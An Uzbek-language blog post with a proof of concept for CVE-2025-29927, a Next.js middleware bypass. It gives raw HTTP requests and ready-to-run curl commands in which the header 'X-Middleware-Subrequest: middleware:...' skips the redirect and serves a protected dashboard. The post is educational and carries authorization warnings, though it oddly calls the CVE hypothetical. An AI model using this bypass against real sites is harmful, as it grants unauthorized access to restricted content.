top of page

CVE-2025-29927: Middleware Zaifligi

a day ago

3 min read

4

105

0

CVE-2025-29927 - veb-ilovada middleware ishlov berishdagi xatolikni namoyish etuvchi faraziy zaiflikdir. PoC maxsus tayyorlangan HTTP so‘rov orqali yo‘naltirish mantig‘ini chetlab o‘tib, cheklangan tarkibga, masalan, boshqaruv paneliga kirishni ko‘rsatadi. Ushbu tanishtiruv faqat ta’lim va xavfsizlik tadqiqotlari maqsadlari uchun mo‘ljallangan.


Ogohlantirish: Mazkur PoC faqat nazorat ostidagi muhitlarda aniq ruxsat bilan foydalanish uchun mo‘ljallangan. Sizga tegishli bo‘lmagan yoki sinovdan o‘tkazishga roziligi bo‘lmagan tizimlarga qarshi ruxsatsiz sinov o‘tkazish noqonuniydir.


Taraddud


Ushbu PoCni amalga oshirish uchun sizga quyidagilar kerak bo‘ladi:


  • Zaif sozlamada ishlaydigan maqsadli server (muayyan dastur/talqin CVE tafsilotlariga qarab aniqlanadi).

  • curl (curl.se), Burp Suite (portswigger.net/burp) kabi HTTP mijoz vositasi yoki maxsus skript.

  • HTTP protokollari va sarlavhalar bo‘yicha asosiy bilimlar (MDN HTTP hujjatlariga qarang).


Zaiflik haqida umumiy ma'lumot


CVE-2025-29927 (rasmiy CVE tafsilotlari mavjud bo'lganda almashtiriladi) middleware noto'g'ri sozlamasi yoki mantiqiy xatolikdan foydalanishga o'xshaydi. PoC shuni ko'rsatadiki, maxsus sarlavha (X-Middleware-Subrequest) qo'shish serverning xatti-harakatini o'zgartiradi va yo'naltirish mexanizmini chetlab o'tib, cheklangan tarkibga kirish imkonini beradi. Bu, ehtimol, middleware (masalan, Next.js bilan Nginx) ostso'rovlarni qanday qayta ishlayotgani yoki sarlavhalarni tekshirishi bilan bog'liq.


PoC Bosqichlari


PoC ikki bosqichdan iborat: dastlabki muvaffaqiyatsiz so‘rov va o‘zgartirilgan muvaffaqiyatli so‘rov. Har bir bosqich HTTP so‘rovini, javobini va batafsil tushuntirishni o‘z ichiga oladi.


1-bosqich: Dastlabki So‘rov (Muvaffaqiyatsiz)


Bu bosqich qo‘shimcha sarlavhalar qo‘shilmagan holda /dashboard manziliga kirishda serverning standart xatti-harakatini namoyish etadi.


HTTP So‘rov


GET /dashboard HTTP/1.1
Host: abc.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

HTTP Javob


HTTP/1.1 307 Temporary Redirect
Server: nginx/1.14.1
Date: Sun, 23 Mar 2025 22:02:08 GMT
Connection: keep-alive

So‘rov Tafsilotlari:

- GET /dashboard: Boshqaruv paneli manziliga kirishga urinish.

- User-Agent va Accept kabi standart sarlavhalar: Oddiy brauzer so‘roviga taqlid qiladi.


Javob Tafsilotlari:

- 307 Temporary Redirect: Server mijozni yo‘naltirishini ko‘rsatadi, ehtimol tasdiqlov, tanituv yoki yo'naltirish mantig‘i tufayli (masalan, login sahifasiga yo‘naltirish).

- Server: nginx/1.14.1: Veb-server dasturini aniqlaydi.


Tahlil:

Yo‘naltirish /dashboard ga to‘g‘ridan-to‘g‘ri kirishni oldini oluvchi himoya mexanizmini ko‘rsatadi. Ushbu javobda Location sarlavhasining yo‘qligi (ehtimol qisqartirish uchun o‘tkazib yuborilgan) yo‘naltirish manzili boshqa joyda ekanligini anglatadi.


HTTP holat kodlari haqida ko‘proq ma’lumotni MDN HTTP Status sahifasidan o‘rganing.


2-bosqich: O‘zgartirilgan So‘rov (Muvaffaqiyatli)


Bu bosqich yo‘naltirishni chetlab o‘tish uchun maxsus sarlavha qo‘shadi va boshqaruv paneli mazmunini muvaffaqiyatli oladi.


HTTP So‘rov


GET /dashboard HTTP/1.1
Host: abc.com
X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

HTTP Javob


HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sun, 23 Mar 2025 22:04:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding
X-Powered-By: Next.js
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Length: 30174

So‘rov Tafsilotlari:

  • X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware: Asl so‘rovga qo‘shilgan maxsus sarlavha. Takrorlangan "middleware" qatori middleware tahlamidagi tahlil yoki tekshirish xatosidan foydalanishi mumkin.

  • Boshqa sarlavhalar 1-bosqichdagidek o‘zgarishsiz qoladi.

Javob Tafsilotlari:

  • 200 OK: Boshqaruv paneli mazmuniga muvaffaqiyatli kirishni tasdiqlaydi.

  • Content-Type: text/html; charset=utf-8: HTML javobini ko‘rsatadi, ehtimol boshqaruv paneli sahifasi.

  • X-Powered-By: Next.js: Ilova Next.js’dan foydalanayotganini ko‘rsatadi, bu React freymuorki bo‘lib, ko‘pincha yo'naltirish uchun middleware’ga tayanadi.

  • Cache-Control: Keshlashni oldini oladi, bu odatda dinamik, foydalanuvchiga oid mazmun uchun xosdir.

  • Content-Length: 30174: Javob bodysining baytlardagi hajmi.

Tahlil:

X-Middleware-Subrequest sarlavhasi middleware’ni so‘rovni haqiqiy ostso‘rov sifatida qabul qilishga aldab, yo‘naltirish mantig‘ini chetlab o‘tadi. Bu ostso‘rovlar qanday tekshirilayotgani yoki qayta ishlanayotganidagi zaiflikni ko‘rsatishi mumkin.

Next.js middleware haqida ko‘proq ma’lumotni Next.js Hujjatlari sahifasidan o‘rganing.


Qanday qilinadi?


PoC-ni curl yordamida takrorlash uchun quyidagi bosqichlarni bajaring:


1-bosqich: Dastlabki So‘rovni Yuborish


curl -v "http://abc.com/dashboard" \
  -H "Host: abc.com" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -H "Upgrade-Insecure-Requests: 1" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "Connection: keep-alive"

Kutilgan Natija: 307 Temporary Redirect javobi.


2-bosqich: O‘zgartirilgan So‘rovni Yuborish


curl -v "http://abc.com/dashboard" \
  -H "Host: abc.com" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -H "Upgrade-Insecure-Requests: 1" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "Connection: keep-alive"

Kutilgan Natija: Boshqaruv paneli tarkibi ham-da 200 OK javobi.


Eslatma: Agar ruxsat etilgan muhitda sinov o‘tkazayotgan bo‘lsangiz, domenni haqiqiy nishondagi domen bilan almashtiring.

Comments
Share Your ThoughtsBe the first to write a comment.
bottom of page